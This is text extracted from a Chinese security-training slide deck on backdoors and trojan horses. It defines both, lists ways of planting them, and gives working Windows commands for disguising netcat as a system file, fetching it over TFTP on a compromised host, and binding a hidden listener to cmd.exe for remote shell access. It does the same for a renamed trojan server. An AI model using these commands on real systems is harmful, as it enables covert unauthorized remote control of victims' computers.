83 木马程序.PPT

深度融合 无缝衔接 共创人才培养新模式 Hwadee Co.,Ltd. ◆ 行业应用软件开发之优秀企业 ◆ 中国大学生校外实训基地建设的开创者和领航人 四川华迪信息技术有限公司 HTTP://WWW.HWADEE.COM 实习实训 就业培训 专业联办 行业应用软件开发优秀企业 中国大学生校外实训基地建设开创者和领航人 深度融合 无缝衔接 共创人才培养新模式 Hwadee Co.,Ltd. ◆ 行业应用软件开发之优秀企业 ◆ 中国大学生校外实训基地建设的开创者和领航人 深度融合 无缝衔接 共创人才培养新模式 Hwadee Co.,Ltd. ◆ 行业应用软件开发之优秀企业 ◆ 中国大学生校外实训基地建设的开创者和领航人 深度融合 无缝衔接 共创人才培养新模式 Hwadee Co.,Ltd. 深度融合 无缝衔接 共创人才培养新模式 Hwadee Co.,Ltd. ◆ 行业应用软件开发之优秀企业 ◆ 中国大学生校外实训基地建设的开创者和领航人 Page * 八、后门与木马 8.1.1 后门程序 概述 后门程序(backdoor)是指绕过系统安全认证的非正常登录而获取计算机系统的访问权。后门程序能够让黑客随意进入远程系统进行控制。 黑客通过在计算机系统上建立后门服务端口或者克隆管理员实现远程控制。 后门程序要具备较强的隐蔽性，防止被管理员、安全软件发现 Page * 8.1.2 木马程序 概述 Page * 木马程序（trojan Horse）是一种驻留在目标计算机系统中的高级后门程序，功能比普通后门程序更复杂。 木马程序包括服务端程序和控制端程序，驻留在目标系统上的是木马服务程序，黑客电脑上运行木马控制端程序就可以远程操纵目标计算机系统。 8.1.3 植入方法 Page * (1)直接上传：利用漏洞入侵目标系统，将木马服务端程序传送并安装到目标系统，方便快捷，前提是目标系统要存在可利用入侵的漏洞。 (2)文件下载：将木马程序与其他软件捆绑，或者伪装成正常软件在用户下载、运行的时候安装木马程序。 (3)U盘传染：木马程序隐藏在U盘中，用户打开U盘时，利用Windows自动播放功能植入到计算机系统。 (4)邮件传播：木马程序通过邮件附件和内容进行传播。 (5)网页挂马：用户访问含有恶意代码网站时自动下载 木马程序并执行，是一种很流行的木马植入法。 8. 2 后门程序 NC Page * NC（NetCat）程序是一个功能丰富的网络调试和开发工具,用于连接网络端口 NC程序也可作为后门服务运行，监听指定网络端口连入请求(inbound connection)，相当于开启后门服务 8.2.1 后门程序 上传 Page * 通过网络上传文件一般由两种方法：文件共享、FTP传输。 FTP传输是最方便快捷的方式，如：建立TFTP传输服务(TFTP Server），然后入侵目标计算机将后门程序下载运行。 8.2.2 隐蔽和伪装 Page * 为提高后门程序隐蔽性、欺骗性，可以将后门程序改名为貌似系统程序文件，如改名为：netcfg，并设置文件属性为隐藏系统文件。 rename nc.exe netcfg.exe Attrib netcfg.exe +H +S 8.2.2 后门程序—上传 Page * 利用漏洞入侵目标计算机，进入其c:\windows\system32目录，该目录存放windows各种系统命令，包括tftp命令。 Server C:\ cd \windows\system32 执行tftp命令从TFTP服务下载伪装的后门程序 Server C:\WINDOWS\system32 tftp -i 3 get netcfg.exe 8.2.3 后门运行 Page * 入侵目标计算机—运行后门程序：(已改名为netcfg)  netcfg -l -vv -p 8899 -e cmd.exe 其中：-l 连接请求监听 -p 后门端口 -e 系统命令 -vv 显示详情 在黑客计算机：连接目标计算机后门服务端口 Hacker nc 0 8899 8.3 木马程序 —上传 Page * 利用漏洞入侵目标计算机，通过tftp命令下载木马服务端程序。 Server tftp -i 3 get muma-server.exe 对木马服务端程序改名、隐藏，提高木马程序隐蔽性、欺骗性。 rename muma-server.exe wintime.exe